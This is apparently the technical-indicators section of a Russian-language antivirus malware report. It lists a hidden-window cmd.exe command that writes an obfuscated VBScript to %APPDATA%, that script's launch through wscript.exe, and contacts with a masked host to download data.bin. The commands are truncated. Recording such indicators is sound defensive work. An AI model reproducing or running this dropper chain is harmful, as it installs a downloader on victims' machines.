Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "FWHk=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm BH" "fUNctiOn Npilh4(FWN51F,RpbmNB8)" "C68nezy=70" "Npilh4=(FWN51F anD nOT RpbmNB8)oR(noT FWN51F aND RpbmNB8)" "OM0tB=29" "eNd FUncti...
- %APPDATA%\30448.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\30448.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "FWHk=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm BH" "fUNctiOn Npilh4(FWN51F,RpbmNB8)" "C68nezy=70" "Npilh4=(FWN51F anD nOT RpbmNB8)oR(noT FWN51F aND RpbmNB8)" "OM0tB=29" "eNd FUncti...' (со скрытым окном)